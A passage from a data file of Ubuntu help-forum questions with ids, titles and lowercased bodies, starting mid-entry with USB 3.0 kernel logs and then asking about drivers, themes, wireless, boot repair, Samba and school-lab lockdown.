usb 3-1 : new superspeed usb device using xhci_hcd and address 2 [ 12.001073 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 12.007059 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 12.012932 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 12.018922 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 12.049139 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 12.056754 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 12.131607 ] xhci_hcd 0000:04:00.0 : warn no ss endpoint bmaxburst [ 12.179717 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 12.686876 ] xhci_hcd 0000:04:00.0 : warn : babble error on endpoint [ 12.687058 ] xhci_hcd 0000:04:00.0 : warn set tr deq ptr cmd invalid because of stream id configuration [ 12.687152 ] xhci_hcd 0000:04:00.0 : error transfer event for disabled endpoint or incorrect stream ring [ 43.330737 ] usb 3-1 : reset superspeed usb device using xhci_hcd and address 2 [ 43.422579 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 43.422658 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff88014669af00 [ 43.422665 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff88014669af40 [ 43.422671 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff88014669af80 [ 43.422677 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff88014669afc0 [ 43.531159 ] xhci_hcd 0000:04:00.0 : warn no ss endpoint bmaxburst [ 125.160248 ] xhci_hcd 0000:04:00.0 : warn no ss endpoint bmaxburst [ 903.766466 ] usb 3-1 : new superspeed usb device using xhci_hcd and address 3 [ 903.807789 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 903.813530 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 903.819400 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 903.825104 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 903.855067 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 903.862314 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 903.862597 ] xhci_hcd 0000:04:00.0 : warn no ss endpoint bmaxburst [ 903.913211 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 904.424416 ] xhci_hcd 0000:04:00.0 : warn : babble error on endpoint [ 904.424599 ] xhci_hcd 0000:04:00.0 : warn set tr deq ptr cmd invalid because of stream id configuration [ 904.424700 ] xhci_hcd 0000:04:00.0 : error transfer event for disabled endpoint or incorrect stream ring [ 935.139021 ] usb 3-1 : reset superspeed usb device using xhci_hcd and address 3 [ 935.226075 ] xhci_hcd 0000:04:00.0 : warn : short transfer on control ep [ 935.226140 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880148186b00 [ 935.226148 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880148186b40 [ 935.226153 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880148186b80 [ 935.226159 ] xhci_hcd 0000:04:00.0 : xhci xhci_drop_endpoint called with disabled ep ffff880148186bc0 [ 935.343339 ] xhci_hcd 0000:04:00.0 : warn no ss endpoint bmaxburst i thought it might be that the firmware was n't compatible with linux or something , but when booting a live image of partedmagic , ( 2.6.38.4-pmagic ) , the drive was detected fine , i could mount it and got usb 3.0 speeds ( at least they double the speeds i got from plugging same drive in usb 2 ports ) . dmesg in partedmagic did say something about no superspeed endpoint which was an error i saw in a previous dmesg of ubuntu : jun 27 15:49:02 ( none ) user.info kernel : [ 2.978743 ] xhci_hcd 0000:04:00.0 : pci int a - > gsi 18 ( level , low ) - > irq 18 jun 27 15:49:02 ( none ) user.debug kernel : [ 2.978771 ] xhci_hcd 0000:04:00.0 : setting latency timer to 64 jun 27 15:49:02 ( none ) user.info kernel : [ 2.978781 ] xhci_hcd 0000:04:00.0 : xhci host controller jun 27 15:49:02 ( none ) user.info kernel : [ 2.978856 ] xhci_hcd 0000:04:00.0 : new usb bus registered , assigned bus number 3 jun 27 15:49:02 ( none ) user.info kernel : [ 3.089458 ] xhci_hcd 0000:04:00.0 : irq 18 , io mem 0xc5400000 jun 27 15:49:02 ( none ) user.debug kernel : [ 3.089541 ] xhci_hcd 0000:04:00.0 : irq 42 for msi/msi-x jun 27 15:49:02 ( none ) user.debug kernel : [ 3.089544 ] xhci_hcd 0000:04:00.0 : irq 43 for msi/msi-x jun 27 15:49:02 ( none ) user.debug kernel : [ 3.089546 ] xhci_hcd 0000:04:00.0 : irq 44 for msi/msi-x jun 27 15:49:02 ( none ) user.debug kernel : [ 3.089548 ] xhci_hcd 0000:04:00.0 : irq 45 for msi/msi-x jun 27 15:49:02 ( none ) user.debug kernel : [ 3.089550 ] xhci_hcd 0000:04:00.0 : irq 46 for msi/msi-x jun 27 15:49:02 ( none ) user.warn kernel : [ 3.092857 ] usb usb3 : no superspeed endpoint companion for config 1 interface 0 altsetting 0 ep 129 : using minimum values jun 27 15:49:02 ( none ) user.info kernel : [ 3.092864 ] usb usb3 : new usb device found , idvendor=1d6b , idproduct=0003 jun 27 15:49:02 ( none ) user.info kernel : [ 3.092866 ] usb usb3 : new usb device strings : mfr=3 , product=2 , serialnumber=1 jun 27 15:49:02 ( none ) user.info kernel : [ 3.092867 ] usb usb3 : product : xhci host controller jun 27 15:49:02 ( none ) user.info kernel : [ 3.092869 ] usb usb3 : manufacturer : linux 2.6.38.4-pmagic xhci_hcd jun 27 15:49:02 ( none ) user.info kernel : [ 3.092870 ] usb usb3 : serialnumber : 0000:04:00.0 jun 27 15:49:02 ( none ) user.debug kernel : [ 3.092961 ] xhci xhci_add_endpoint called for root hub jun 27 15:49:02 ( none ) user.debug kernel : [ 3.092963 ] xhci xhci_check_bandwidth called for root hub well i have no idea what 's going wrong , and i have n't had much luck from google and the forums so far . a number of unanswered threads with people with similar error messages and problems only . hopefully someone here can help or point me in the right direction ? !
50869	ati x 1270 on packard bell dot ma netbook	dont understand why there are no support for this video card . i have to quit using ubuntu because of that ! ! !
50870	how do i update virtualenv ?	i have installed python-virtualenv version 1.4.9 and the latest version is 1.6.1 . how do i update to version 1.6.1 . do i have to uninstall version 1.4.9 ? if so , how do i uninstall it ? ( crossposted on stack overflow )
50872	what did i do wrong when i installed this theme ?	i have a problem installing a theme for my ubuntu , note that i am very new to it and probably messed something up . still it seems to me that i did everything like it was stated in the install file . theme : http : //opendesktop.org/content/show.php/ ? content=140562 so i downloaded the *.zip package , unzipped it in ~/.themes folder and changed controls and borders inside my theme preference . still my result is pretty poor . you can look at the image , it looks nothing like what in the screenshot of the author . i also installed fonts running sudo apt-get install ttf-mscorefonts-installer and tried to install gtk2 engine as sudo apt-get install gtk2-engines-murrine gtk2-engines-pixbuf , but it showed that 0 files was modified since i already have it . please tell me what did i did wrong so i can fix that : )
50875	everything disabled in pitivi	i 'm trying to use pitivi ... i can import clips from my video camera , but the render button and all the editing buttons on the bottom toolbar are disabled . i suspect i need to install some packages but which ones ? i am not stuck on pitivi , but since it came with the os , i was kind of expecting it to be the easiest to use ...
50876	how to connect to a wireless network that has a two word name with a space ?	ok , i have searched for some time in earnest for an answer to this question . i have a beagleboard which has ubuntu 10.10 minimal install for arm running on it . with the default install , minimal tools , no gui , i am unable to connect to my wireless network . the name of my network is `` myname network '' . using a text editor to edit /etc/network/interfaces i can not seem to connect at all . as an experiment , i connected to a friends network , which has a one word name `` dystek '' , and was able to connect with zero issues , and update and install a full gui for ubuntu arm . the problem is that i do n't want a full blown gui on the beagleboard , just a minimal install of ubuntu with cli is all i need or want . is there anyway to connect to my wireless network via editing the /etc/network/interfaces file . surely there is ... i just do n't know how . right now my interfaces file looks like this : auto lo iface lo inet loopback auto wlan0 iface wlan0 inet static address 192.168.1.200 netmask 255.255.255.0 gateway 192.168.1.1 wireless-essid barrett network wireless-key 46456xxxxxxxx any help would be appreciated .
50877	help ! i broke apt-get with partial install of ubuntu-restricted-extras	i was trying to install ubuntu-restricted-extras from the command line , as instructed here : ca n't play dvd with movie player near the end , i came to a eula screen that would n't let me past it . clicking ok , hitting enter , nothing worked . after aborting that attempt at installing , i find that attempting to install anything leads to the following message : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 961 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1085 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 226 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : i was n't able to locate file for the ttf-mscorefonts-installer package . this might mean you need to manually fix this package . ( the above was an attempt to install 7zip from the software center . ) how do i undo what i 've done ? tell me how this can be fixed without re-installing the os . i 'm not particularly linux-savvy , so please help me to understand how i can investigate this problem , and hopefully regain the ability to install software without reinstalling the os .
50885	only starting in command mode after i tried installing nvidia drivers	i had put in a new video card on the box and tried installing nvidia drivers version 173 via command line and system â administration â additional drivers . now when i try to restart ubuntu 11.04 it is starting in command prompt mode . what can i do to fix this or get the things back as they were ?
50886	how do i fix broken installation ?	let me start off by saying i 'm dual booting 11.04 and windows 7 on a thinkpad t61p . the problem may have arisen when i hit the power button during normal startup . i 'm fully aware how stupid this is . i do n't know why i did it . i did it . now , i ca n't get in to ubuntu . windows works fine . but when i try to start ubuntu normally , it seems to run some checks , and does not start up . sometimes , i see a black screen , and it tells me that it 's running certain checks , and then , [ ok ] . like ... battery check somethingorother [ ok ] it 'll give me 1-5 of these . and then it just does nothing , and i have to turn it off . when i try to start in safe mode ... i tried low graphics mode , and after going through a couple of dialogue boxes , i 'm brought right back to the safe mode dialogue box . and if i hit 'resume , ' a shell pushes up ( still that grey on black `` your computer is broken '' type shell ) and asks me to log in . i do , and try to run unity . it tells me something along the lines of : warning no display variable set and then sets it to `` :0 '' , which does n't work . and then i ca n't do anything , really , and i have to restart . ( i do n't know how to do this from the command line , so i just hard reset . that command would be helpful ) . does anybody have any idea how i can get ubuntu working right again ? ftp is less pleasant in explorer than it is in nautilus or w/e it is now .
50888	different action for unity launcher icon depending on action ?	i 'm making a launcher that when clicked will open up a chromium window with tabs for gmail , google docs , and google calendar , but i 'd also like to drag and drop documents into the launcher icon and have them automatically uploaded to google docs . how can i differentiate an exec for clicking and an exec for drag and drop ?
50890	can i input chinese character in unity 's dash ?	i use ubuntu in chinese language . and a lot of programme on my ubuntu have chinese name . i can open it in terminal . but i can not search them in unity . because in unity 's dash , i can only input english , can not use input method . so can not input chinese character . i use chinese as my mother language . and i use chinese input method a lot . can someone help me to let me input chinese character in unity 's dash ? i really like ubuntu and want to use it more frequently . thanks .
50892	installing kde alongside gnome	i 'm using ubuntu with the standard gnome environment . i 'd like to use the kde desktop , but i do n't want to install the apps , i 'd rather use the same applications i already have installed for gnome . which package installs only the desktop environment without any of the apps that are part of kubuntu-desktop ?
50898	how to use ampersand in command line ?	when inputting a google maps directions url into the command line ( for opening with chromium browser via terminal ) there is an ampersand ( & ) in the url , however the terminal breaks it there because of unix stuff being unix stuff ... is there something i can type into the terminal that when the command actually goes through , it will be treated like an ampersand ? will ; amp ; work ?
50902	how can i restrict changing of the keyboard layout to root users only ?	is there any way by which i can disable `` changing the keyboard layout '' so that only a user with root privileges can change the layout .
50903	nothing seems to be syncing with ubuntu one	so earlier tonight i set up ubuntu one on a fresh install of ubuntu 10.10 . in my `` ubuntu one '' directory , i created symbolic links to /documents /pictures and /music . right now , there is very little in those directories but what is there is n't syncing at all . when i go to the ubuntu one web interface , it tells me i 'm using 0.00 % of my storage space . when i try to view the files in the web interface , i am told 'something has gone wrong ' and i do n't see anything . can anyone help ? even my tomboy notes are n't syncing ! and yes , i am connected and the software says 'synchronisation complete' thanks , anthony
50906	how to install a pae version of linux 3.0 ?	was wondering how i would go about installing linux kernel 3.0 with pae enabled in natty ? is there a ppa available with this included or do i have to compile from scratch ?
50908	creating jfs partition of particular block size	i am creating jfs partition in ubuntu 9 using the following command : mkfs.jfs /dev/sda1 bs=1024 here i 've mentioned the block size of that partition to be 1024 but when i check the information of this partition using jfs_tune then aggregate block size is shown 4096.. where is the main issue ? why that partition is not set to be of block size 1024 .
50912	how do i move the unity launcher to the left monitor ?	i have a laptop which i sometimes connect to a screen . the screen is positioned left to the laptop . the unity dock is kept on the laptop screen and does not move to the screen left side ( which is the left of my working space ) . is there a way to fix that ?
50916	movie player has require plugins , claims dvd encrypted	i 've been trying to gain the ability to view dvds on ubuntu 11.04 . i 'm using movie player . i have installed the ubuntu-restricted-extras package , but when i attempt to play the dvd i receive the following message : could not read dvd . this may be because the dvd is encrypted and a dvd decryption library is not installed . any ideas ?
50920	emesene does not support rtl languages ?	i am using emesene 2.11.5 in natty . but emesene does n't log conversations . also right to left languages `` arabic '' is written from left to right , ltr instead of rtl . any idea if there is a newer version that can do that ? or maybe there is something i can do to solve these problems ?
50922	lag when recording with xvidcap ?	i used xvidcap to record my desktop , but the quality of video was too bad ( it lagged so much ) . i also tried with all output formats that xvidcap support , increase the frame-per-second as much as possible and the quality always at 100 % but nothing changed . click to see my video on youtube im using 11.04 ( unity ) with compiz enabled . my card is ati/amd mobility 5450 and all drivers were installed and activated . please help me ! regards .
50928	qtcurve vs oxygen gtk theme	is there any difference between qtcurve and oxygen gtk+ theme for running gtk applications in kde ? is oxygen gtk better for me to use since i 'm using the oxygen theme anyway ?
50929	how do i select qtcurve theme for gtk apps in kde ?	i have only the base kde installed ( sudo apt-get install plasma-desktop ) , not the entire kubuntu-desktop . unfortunately gtk apps have the fugly raleigh theme . i 've installed qtcurve with sudo apt-get install qtcurve , but the gtk apps still have raleigh theme . i assume i have to select the qtcurve theme somehow . @ 13east has posted a picture of the settings dialog in his answer below . unfortunately the gtk+ appearance is the only tab that is missing from my settings dialog . i assume this is because i 've installed only plasma-desktop instead of the entire kubuntu-desktop . is there a way to manually set the theme , perhaps by editing some configuration files ?
50931	how do i install the latest stable version of thunderbird ?	similar to firefox , what 's the best way to stay up to date with the latest stable releases of thunderbird ?
50935	screen configuration not saved after first reboot	problem - when installing ubuntu natty on my friends laptop with a hdmi cable attached to both tv and laptop both screens echo each other but when reboot has taken place nothing is displayed on the external screen . another user has reported the same problem so far ! http : //ubuntuforums.org/showthread.php ? t=1764389 & highlight=hdmi - > gives a clearer description of what we are both experiencing the ubuntu/natty install drives both screens but the first reboot does not ? any ideas anyone
50937	place notify osd on top of screen gnome 3	i was wondering if i can rearrange the notifyosd to the top bar . i am currently using gnome3 on ubuntu 11.04 with zukitwo theme and the notification bar is in the bottom of the screen . thanks for your help !
50938	how can i switch user in a shell and use the existing gnome display session ?	if i switch user in a terminal . su bob i ca n't open gedit because bob does n't own the display . if i execute xhost + before switching to bob i can open the display for some applications but not all . i get the following output when trying to execute gedit : ( crashreporter:4415 ) : gnomeui-warning * : while connecting to session manager : none of the authentication protocols specified are supported . * glib-gio : error : /build/buildd/glib2.0-2.28.6/./gio/gdbusconnection.c:2279 : initable_init : assertion failed : ( connection- > initialization_error == null )
50943	can i invoke a graphical program to run with a hidden window ?	i have a program that interprets the input from my mouse and provides multitouch gestures . i wrote it using a game engine , which always creates a window when it runs . i 'd like to run this program without seeing the window , so this is the point of the questions : can invoke a graphical program but have the window hidden ? by hidden i mean anything that keeps me from encountering the window on my desktop . so i would accept something like , `` open on a different , previously non-existant screen . ''
50944	change the appearance of the file browser ?	how can i change the appearance of the file browser ? i want my file browser look like : my current file browser looks like :
50947	starting a service from /etc/event.d works , but not from /etc/init	i 'm trying to launch an upstart service on ubuntu 8.04 from /etc/init/ , but i always get start : unknown job : job . when i try to launch this script from /etc/event.d/ it works fine . why would this be and how would i fix it ?
50949	how do i find out which driver a piece of hardware is using ?	today i 'm trying to figure out which driver is best for my usb wireless dongle . everywhere i look i just see ralink sta but this is n't telling me which module this actually is . i 'm sure there 's a way of looking it up but the computer should be able to tell me , should n't it ? meta : this question is open to any piece of hardware , not just my wireless card . it would be helpful if we had a thread of useful diagnostic procedures so that other people can find out what 's going on with their hardware .
50951	how can i setup a samba share to use permissions from my active directory domain ?	i have a freshly installed ubuntu 11.04 server . i would like to create a samba share and integrate the permissions for it with my existing active directory domain . i started to follow this article ( https : //help.ubuntu.com/community/activedirectorywinbindhowto ) but it was a spaghetti mess of links to other outdated articles . does anyone know of a current tutorial on how to do this ? thanks ! it lists the following prerequisites 1 . software * samba > 3.0.20 * kerberos mit/heimdal * ntp * often cups-server 2 . permissions/users * root-user on the server * an ad user with the permission to join ad am i safe to just apt-get install samba smbfs ? i 'm new to samba/kerberos and see a lot of related packages . for kerberos the ubuntu site says to install krb5-user , krb5-config , and libkadm55 . libkadm55 does n't exist . what should i do there ?
50952	crashing .svg in nautilus	it happens sometimes , but i 've managed to restore the nautilus without rebooting the system.but today , when i attached a file .svg by e-mail , he first caught the google chrome and then firefox 5 , and when i open the folder in nautilus ubuntu crashed . making me to restart the pc via alt + sysrq + b. i know there is a bug related to it , and i also know that there is no preview thumbnails for nautilus , but that could be set up so only thumbnails of files .svg did not appear ?
50953	which gpu with my cpu for 1080p flash ?	based on the following site : http : //www.adobe.com/products/flashplayer/systemreqs/ i need the following minimum spec to play 1080p flash video via a browser : cpu : 1.8ghz intel core duo , amd athlon 64 x2 4200+ , or faster processor ram : 512mb of ram gpu : 64mb of graphics memory i only have a 2.8ghz pentium 4 process which is no where near as good as the processor listed above . i do n't want to upgrade my processor as i think it will mean i have to change the motherboard etc . so , my question is , what is the cheapest pci-e gpu i can buy which will allow me to play smooth 1080p flash video via a browser . i think the cheapest i can get is the 8400gs , but am not sure if that will be able to handle 1080p with the processor i have . i have looked at the gt520 and was wondering if this is the cheapest gpu which i need , or if there is something cheaper which will do 1080p with a 2.8ghz pentium 4 . or , will i have to get something better than a gt520 ?
50958	how to take a screenshot every n second ?	what software can i use to take screenshots with a set interval ? i 'd like to take screenshots every 2 second or so . command-line and gui are both ok . i 'd prefer software that can also resize and compress each screenshot .
50962	how to customize ubuntu bash to make it like mint ?	i love linux mint 's bash customization . it includes both a color prompt and a quote displayed with ascii art . is it possible to have it in ubuntu ?
50964	ca n't install on an acer aspire timeline x 5820tg	ubuntu 11.04 wont install after first attempt resulted in computer freezing during authentication of the ati graphics card driver ( right after the authentication of the broadcom sta driver ) . now it wont even install . the computer freezes after the restart after the first part of the installation . trying it out with wubi installer . tried before on a dell inspiron 1525 . there the os installed ok and worked but the wireless did n't work and i do n't have a lan cable . want to change environment for my web development since i 'm such a big fan of the `` open-source '' ideology and community . but this is keeping me from joining the community . please help . have this acer timeline x : intel core i5-480m ; cpu speed : 2,53 ghz ; dual core ; 64-bit . chipset : intel hm55 express ; ram : 4 gb ddr3 - 1066 mhz/pc3-8500 screen size : 15.6 '' aspect ratio : 16:9 screen mode : wxga hdcp support : yes graphics controller manufacturer : ati graphics controller model : graphics media accelerator hd graphics memory capacity : 1 gb graphics memory technology ddr3 sdram wi-fi manufacturer acer wi-fi model invilink nplify wi-fi standard ieee 802.11b/g/n ethernet technology gigabit ethernet
50968	can not boot livecd	i have created a fresh livecd ( using edubuntu-11.04-dvd-i386.iso ) but when i boot my laptop , it hangs at the very beginning with the line : '' isolinux 4.02 debian-20101016 etcd copyright ( c ) 1994-2010 h. peter anvin et al '' the laptop is an old toshiba satellite pro . i have tried this cd on my pc and the livecd can boot there . any ideas ?
50970	wifi does not work , broadcom sta wireless driver does not work on a bcm4313	i 'm newbie in linux and ubuntu , but would like to improve my skills : ) i just installed ubuntu 11.04 on my laptop ( lenovo b560 , dualboot windows 7 64-bit ) and have got an issue with wireless connection - it does n't work under ubuntu . my wireless adapter is broadcom corporation bcm4313 802.11b/g/n . i had installed broadcom sta wireless driver , but it does n't fix my problem - wireless network is disabled - i ca n't enable it . i 've got a message : driver is activated but not currently in use . it would be great if someone could help me to solve it . below is the output of the command sudo lshw -c network : *-network unclaimed description : network controller product : bcm4313 802.11b/g/n wireless lan controller vendor : broadcom corporation physical id : 0 bus info : pci @ 0000:04:00.0 version : 01 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list configuration : latency=0 resources : memory : f2500000-f2503fff
50975	how can i organize mixed mp3 files in natty ?	i have missorted the mp3 files into different folders . is it possible to organize all the mp3 files in correct folders ? can i move the files in those folders according to the genre ?
50976	how can i lock application windows to a certain virtual desktop ?	i want to keep pidgin , skype , and a few other applications on a certain virtual desktop . how can i go about doing this , so that when i open these applications from my `` primary '' virtual desktop , the windows will appear in the other virtual desktop ?
50980	linux kernel regression on power usage	webupd8 reported this power management fix for the 2.6.38 linux kernel regression : add the following to the boot grub line `` pcie_aspm=force '' my question - how does this suggested fix differ from this hint from powertop : suggestion : enable device power management by pressing the p key , which execute the following action : find /sys/devices/pci* -path `` *power/control '' -exec bash -c `` echo auto > ' { } ' '' \ ;
50983	ubuntu dvd for africa	i live in tanzania africa and have been promoting ubuntu for use by ngos , schools , and friends . so far i 've got a lot of positive feedback , but do have one huge problem . internet here is both slow and very costly ( up to $ 1,200 per month ) so what i am looking for is a current release of ubuntu which includes all the updates and popular applications already on it like ; gimp , vlc , ubuntu restricted files , scribus , inkscape , virtualbox , chrome , audacity , compiz , blender , ubuntu tweak , gnucash , skype , etc ... basically all the 4 - 5 star applications . does a hybrid dvd exist ? i found links to one called ubuntu install box 11.04 , but not sure if they are truly legitimate . any help would be greatly appreciated . brendon
50984	why do i recieve multiple warnings of `` no running instance of xfce4-panel was found '' when logging into xubuntu ?	i 'm running xubuntu 11.04 , the bootup-time is quite fast but when i log in it takes close to a minute before the desktop is displayed , meanwhile i see no activity on the hard drive . when i finally have the desktop i see this notification repeated 10 times : and then this one : in .config/autostart i have these entries $ ls xfce4-settings-helper-autostart.desktop xfce4-clipman-plugin-autostart.desktop xfce-panel.desktop $ cat xfce-panel.desktop [ desktop entry ] encoding=utf-8 version=0.9.4 type=application name=xfce4-panel comment= exec=xfce4-panel startupnotify=false terminal=false hidden=false i need some assistance to locate the slow startup , which logs to look at etc . and then this annoying message about xfce-panel . where do i look for from where it is started .
50985	local server updates for the network	i have setup one computer on our network as the file server . because internet here in tanzania is both slow and expensive i would like that one system to download all the updates and then the other 10 computers on the network to get those update files from the server . i 'm a bit of a noobie to ubuntu , but really want to learn how to get this working smoothly so as to help other ngos and schools here in tanzania . brendon
50988	where 's documented combo box usage with zenity ?	i found by chance it was possible to display a combo box with zenity ( version tested : 2.32.1 ) . see the following code : # ! /bin/bash array= ( a b c d e ) value= $ ( zenity -- entry -- title `` window title '' -- text `` $ { array [ @ ] } '' -- text `` insert your choice . '' ) the result is illustrated with the following 3 images : i have two questions about that : is there a documentation about this functionality ? i did n't find anything in the zenity documentation . why the first value of my array does n't appear in the combo box ? in the example above , my array is ( a b c d e ) , and the combo box only displays b c d e. as a workaround , i add a value in my array , for example ( 0 a b c d e ) .
50990	creating ubuntu live cd with customized unity launcher	i would like to create a custom ubuntu image based on natty using ubuntu customization kit . i also want to customize the icons appearing on the unity launcher . i can change the icons on my desktop system with the following command : gsettings set com.canonical.unity.launcher favorites `` [ 'firefox.desktop ' , 'nautilus-home.desktop ' , 'libreoffice-writer.desktop ' ] '' i tried to run this command from the uck console while creating the live cd , but it doesnât seem to work . do you have any ideas how i could solve this ?
50995	ubuntu 11.04 on a archos 101 internet tablet ?	does anyone have experience with the archos 101 internet tablet 8gb or 16gb . can i install ubuntu 11.04 on it ? can i dual boot ubuntu / android ? specs on archos
51000	where do i get the firefox global menu extension ?	i switched to using the beta channel for firefox recently . i do n't have the extension allowing firefox to use the global menu , and i 'm not sure where to find it . what do i do ?
51002	error when transferring a file via bluetooth to a samsung galaxy phone	i am using ubuntu natty . i want to transfer files to and from my samsung galaxy which is running froyo . but every time i try to transfer a file from my samsung galaxy phone to ubuntu natty i get the message remote device rejected your request on my phone . i do n't know what to do about it . can someone please help me or point me in the right direction ?
51008	web browser downloads only open target folders - can not open files	after installing xubuntu packages in order to check xfce , i reverted back to gnome2 . during the first login , i noticed that thunar was now selected as the default file manager . preferred applications menu is also missing now , so i could not set nautilus as the default . i removed all the xubuntu packages ( including thunar ) and then when i tried to open a folder , i was asked to select the default file manager - that 's how i got nautilus back . the next problem i 'm now facing has to do with the downloaded files from web browsers : open and open containing folder options produce exactly the same result . if i double-click on a file , it 'll just open the containing folder , instead of opening the file with it 's associated application ( e.g . libreoffice writer for .doc , .odt , smplayer for .avi , .wmv , etc ) . the problem happens both in firefox and chrome . through nautilus , all files open correctly . up until now i 've tried the following : delete/recreate mimetypes.rdf in my ff profile create a new profile in ff delete/recreate ~/.local/share/applications/mimeapps.list already checked this similar article none of them worked . any ideas on the issue would be appreciated .
51010	no unity-2d folder in gconf-editor > desktop	i upgraded a dell inspiron e1505 from 10.04 to natty ( 11.04 ) two days ago . i wanted to change properties in my unity toolbar but when i opened gconf-editor > desktop i found that there was no unity-2d folder . what is under gconf-editor < desktop is gnome , ibus and pgp . what do i do now ?
51017	what gstreamer packages to install for pitivi	this page describes the various gstreamer packages used by pitivi but does not give actual package names . which gstreamer packages do i need to install ? what other packages may be needed ? here is what my pitivi looks like ... notice the disabled render project button on the top and disabled timeline editing buttons on the bottom .
51024	i lost my top left panel in unity . how can i get it back ?	i messed around with the compiz setting to set up desktop cube when i first installed 11.04 . big mistake right ? i have everything back to normal but my top left panel is gone and i have tried everything to get it back . unity -- reset usually hangs on me and nothing else i have seen in the forums works .
51025	unity is using something that looks like emerald instead of the correct theme ( like metacity )	i just upgraded my netbook thus : lucid - > maverick - > natty . ( i skipped maverick other than as an upgrade step due to issues with unity . ) now , i seem to be stuck with something that looks like emerald but apparently is n't ( see note below ) . compiz is running , as is gtk-window-decorator , but my title bars are n't following ubuntu 's theme . i was using the ambiance theme with no problems until the upgrade to natty . here 's a screenshot : how can i get the default theme ? note : i never installed emerald , and as far as i can tell it is n't installed . there 's no running process containing the string emerald . so i 'm not sure where gtk-window-decorator is getting its configuration from . edit following htorque 's very reasonable suggestion to run unity -- reset made matters worse . now , after logging out/in , most of my theme-related stuff is gone entirely and ca n't be changed ( clicking on the themes in the dialog changes the title bar/scrollbar color but nothing else ) . here 's a screenshot of the current situation :
51036	configure compiz without ccsm	is there a way to edit compiz settings in a config file or gconf/dconf ? please provide an example configuration being done in ccsm and the alternative method .
51037	combo microphone does not work	i have a internal audio hardware card and my laptop ( lenevo ideapad ) presents a single slot as a combo microphone and headphone jack . on windows , i attach my ipod headphone to jack and speak directly to my computer . i assume there is a microphone which is listening to my voice and i can communicate two-way . on ubuntu , the microphone always seem to be listening to random noise . so any input by speaking to the computer is not possible . what could be the reason and how do i troubleshoot this ?
51061	conky window jumps to the top	occasionally , my conky window jumps to the top and covers all other windows . the only way to solve it is to kill and restart conky . this happens at seemingly random times while using compiz features . it seems especially common while using the scale plugin 's window picker , but no plugin consistently causes this problem every time . i 've seen several questions that appear related on the surface . however , all those questions are solved by ensuring that conky starts after compiz . in my case , my problems occur even if conky starts after compiz . here 's my ~/.conkyrc : # conky settings # background no update_interval 1 cpu_avg_samples 2 net_avg_samples 2 override_utf8_locale yes double_buffer yes no_buffers yes text_buffer_size 2048 # imlib_cache_size 0 temperature_unit fahrenheit # window specifications # own_window yes own_window_type override own_window_transparent yes own_window_hints undecorate , sticky , skip_taskbar , skip_pager , below border_inner_margin 0 border_outer_margin 0 minimum_size 200 250 maximum_width 200 alignment tr gap_x 5 gap_y 20 # graphics settings # draw_shades no draw_outline no draw_borders no draw_graph_borders no # text settings # use_xft yes xftfont ubuntu : size=8 xftalpha 0.5 uppercase no temperature_unit celsius default_color ffffff # lua load # lua_load ~/.lua/scripts/clock_rings.lua lua_draw_hook_pre clock_rings text < snip >
51067	ubuntu does n't boot after adding a bootflag to the windows partition	i have ubuntu 10.10 installed on one ( physical ) hd and on the other one windows . on both drives grub is installed to boot both operating systems . when i wanted to install sp1 for win 7 i had to add a bootable flag to the partition from which windows boots , otherwise the installation of sp1 does not work . i did so by booting into ubuntu and using gparted to add this flag . after doing so the update for sp1 worked without any problems . when trying to boot back into ubuntu grub complained that it could n't find the kernel anymore ! i tried to boot into a ubuntu minimal cd and to restore grub using chroot , update-grub and grub-install which did n't work . i still had the problem that it was unable to boot ubuntu putting me in some minimal system called initramfs . it seems however that the uuid of the partitions changed . i guess this happened when i added the bootflag to the windows disk . next thing i tried was to tell grub not to use the uuid for loading the kernel by uncommenting something in /etc/default/grub . then i got the kernel booting but it suddenly stops ( i guess when it is trying to mount the root file system ) saying that the concerning uuid does not exist putting me into initramfs again . the strange thing is that there i coulnd't even manage to mount the root partition using /dev/sdb1 ( on which it is in my case ) . i would be glad if there is a way to restore the system again without having to reinstall it . update in case anyone cares i solved this . for some reason i also reseted the bios and it set the sata protocol back to ide . it seems that there is no driver for this in initrd . so i just set it back now it works again .
51073	locking down systems in a computer lab school for orphans	i am helping out an ngo , called orphans found fund , here in arusha tanzania setup a computer lab to teach students about ubuntu and open source applications . i have installed ubuntu 10.10 on all the systems . what i 'm wondering about is how to tweak the systems so that the kids can not : delete or alter system files alter the system settings add or remove applications exceed a time limit ( like an internet cafe ) also as the administrator i would like to monitor the usage for another system to make sure that abuse of network is not taking place . any advice is much appreciated . brendon
